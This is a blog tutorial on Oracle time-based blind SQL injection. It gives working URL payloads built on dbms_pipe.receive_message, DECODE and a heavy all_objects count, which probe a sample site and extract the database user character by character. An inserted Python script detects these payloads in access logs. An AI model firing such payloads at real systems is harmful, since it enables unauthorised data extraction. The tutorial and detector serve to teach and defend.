Summary of Oracle time-based blind SQL injection

0x00 Foreword

Oracle injection can be detected through the state of the page response. Here we use the response time: deciding whether injection exists from how long the SQL takes to execute is called time-based blind injection.

Oracle time-based blind injection usually uses DBMS_PIPE.RECEIVE_MESSAGE(); another option is to combine DECODE() with a time-consuming SQL operation. Of course, other constructs can also be combined with a slow operation. By a time-consuming operation we mean something like (SELECT COUNT(*) FROM all_objects): a query over a large amount of data, or other heavy processing inside the database, takes noticeably longer, and the data is then extracted through that timing difference. This approach also applies to other databases.

0x01 DBMS_PIPE.RECEIVE_MESSAGE() function time-based blind injection

The DBMS_LOCK.SLEEP() function lets a process sleep for a given number of seconds, but there are many restrictions on using it.

First, the function cannot be injected directly into a subquery, because Oracle does not support stacked queries. Second, only a database administrator can use the DBMS_LOCK package.

There is a better way in Oracle PL/SQL: the following call can be used for an inline delay injection:

dbms_pipe.receive_message('RDS', 10)

The DBMS_PIPE.RECEIVE_MESSAGE function waits 10 seconds for data to be returned from the pipe RDS. By default, execute permission on this package is granted to PUBLIC. In contrast to DBMS_LOCK.SLEEP(), it is a function and can therefore be used inside a SQL statement.

Applying the delay to blind injection:

http://www.jsporcle.com/news.jsp?id=-1 or 1= dbms_pipe.receive_message('RDS', 10)--
http://www.jsporcle.com/news.jsp?id=1 and 1=dbms_pipe.receive_message('RDS', 10)--

If the page takes 10 seconds longer to return, injection is present.

DBMS_PIPE.RECEIVE_MESSAGE syntax from the official documentation:

DBMS_PIPE.RECEIVE_MESSAGE (
   pipename IN VARCHAR2,
   timeout  IN INTEGER DEFAULT maxwait)
RETURN INTEGER;

For now this can be understood as DBMS_PIPE.RECEIVE_MESSAGE('arbitrary value', delay time in seconds).

0x02 DECODE function time-based blind injection

DECODE can be used not only for Boolean-based blind injection but also for time-based blind injection.

Add a DECODE expression to the injected delay. Here we combine it with the dbms_pipe.receive_message function:

and 1=(select decode(substr(user,1,1),'S',dbms_pipe.receive_message('RDS',10),0) from dual) --
http://www.jsporcle.com/news.jsp?id=1 and 1=(select decode(substr(user,1,1),'S',dbms_pipe.receive_message('RDS',5),0) from dual) --

Of course, the delay does not have to come from a dedicated delay function; a query that makes the database spend a long time, such as counting all entries, can also be used. For example:

(select count(*) from all_objects)

http://www.jsporcle.com/news.jsp?id=1 and 1=(select decode(substr(user,1,1),'S',(select count(*) from all_objects),0) from dual) and '1'='1'

The result of the injected expression can then clearly be determined from the time difference.
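A defender-side check for the two delay techniques described above, written here as an added example (not code from the original post): it scans constructed web-access-log lines, URL-decodes the query string, flags the Oracle delay primitives (dbms_pipe.receive_message, dbms_lock.sleep, count(*) from all_objects) and a decode() wrapper around them, and marks responses slower than an assumed 2-second threshold. The log format, field order and threshold are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (hypothetical format): status, request URI,
# response time in milliseconds. The payloads are the ones discussed in this post.
SAMPLE_LOG = """\
200 /news.jsp?id=1 120
200 /news.jsp?id=1%20and%201%3Ddbms_pipe.receive_message(%27RDS%27,10)-- 10140
200 /news.jsp?id=1%20and%201%3D(select%20decode(substr(user,1,1),%27S%27,dbms_pipe.receive_message(%27RDS%27,5),0)%20from%20dual)%20-- 5210
200 /news.jsp?id=1%20and%201%3D(select%20decode(substr(user,1,1),%27S%27,(select%20count(*)%20from%20all_objects),0)%20from%20dual) 3900
200 /news.jsp?id=7 95
"""

# Signatures of the Oracle delay primitives described above (case-insensitive,
# whitespace-tolerant so that trivial spacing changes do not evade them).
DELAY_SIGNATURES = [
    ("dbms_pipe.receive_message", re.compile(r"dbms_pipe\s*\.\s*receive_message", re.I)),
    ("dbms_lock.sleep", re.compile(r"dbms_lock\s*\.\s*sleep", re.I)),
    ("count(*) from all_objects", re.compile(r"count\s*\(\s*\*\s*\)\s*from\s+all_objects", re.I)),
]
DECODE_RE = re.compile(r"\bdecode\s*\(", re.I)
SLOW_MS = 2000  # assumed threshold; tune to the application's normal response times

def analyze_line(line):
    """Return a finding for one log line: which signatures hit and whether it was slow."""
    _status, uri, ms = line.split()
    ms = int(ms)
    # Decode the query string so percent-encoded payloads are matched as written.
    query = unquote_plus(uri.split("?", 1)[1]) if "?" in uri else ""
    reasons = [name for name, rx in DELAY_SIGNATURES if rx.search(query)]
    if reasons and DECODE_RE.search(query):
        reasons.append("decode() conditional around a delay")
    if ms >= SLOW_MS:
        reasons.append(f"slow response: {ms} ms")
    return {"uri": uri, "ms": ms, "reasons": reasons, "suspicious": bool(reasons)}

def analyze_log(text):
    """Analyze every non-empty line and return the list of findings."""
    return [analyze_line(ln) for ln in text.splitlines() if ln.strip()]

if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        if f["suspicious"]:
            print(f["ms"], "ms", f["uri"][:60], "->", "; ".join(f["reasons"]))
```

A request that is slow but carries no signature is still reported, which is what catches variants using other heavy queries; correlating it with the database's own slow-query log is the natural next step.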

posted @ 2019-05-30 20:57 Mr. Ching

Origin: blog.csdn.net/qq_17204441/article/details/91863375